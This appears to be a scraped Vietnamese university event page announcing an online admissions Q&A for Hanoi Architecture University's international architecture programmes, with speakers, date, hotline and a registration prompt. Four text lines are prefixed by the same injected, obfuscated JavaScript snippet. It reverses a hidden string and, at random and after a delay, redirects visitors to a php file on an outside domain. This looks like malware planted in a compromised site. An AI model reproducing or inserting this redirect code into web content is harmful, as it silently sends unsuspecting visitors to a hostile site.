$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>🎬🎬🎬 Giao lưu trực tuyến tư vấn Tuyển sinh số 5: Viện Đào tạo và Hợp tác quốc tế tìm hiểu tất cả thông tin về các 02 Chương trình: Chương trình Tiên tiến ngành Kiến trúc (học bằng tiếng Anh) và Chương trình Cử nhân Kiến trúc Pháp
$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>TS. KTS Lê Chiến Thắng, Viện trưởng viện Đào tạo và Hợp tác quốc tế
$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>TS. KTS Nguyễn Thái Huyền – Phó Viện trưởng Viện Đào tạo và Hợp tác Quốc tế, Giám đốc Trung tâm Đào tạo Quốc tế – Trường Đại học Kiến trúc Hà Nội
$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”>Các quý vị phụ huynh và học sinh đặt câu hỏi phần comment/inbox để các khách mời giải đáp trực tiếp.
http://tuyensinh.hau.edu.vn/

Thông tin sự kiện

  • Thời gian: 20:00 - 25/04/2021
  • Địa điểm: Trường Đại học kiến trúc Hà Nội
  • Hotline: 0982619900
  • Email: tuyensinhiitc@hau.edu.vn

Đăng ký

Vui lòng điền đầy đủ thông tin bên dưới để tham gia sự kiện "Giao lưu trực tuyến tư vấn Tuyển sinh số 5: Viện Đào tạo và Hợp tác quốc tế"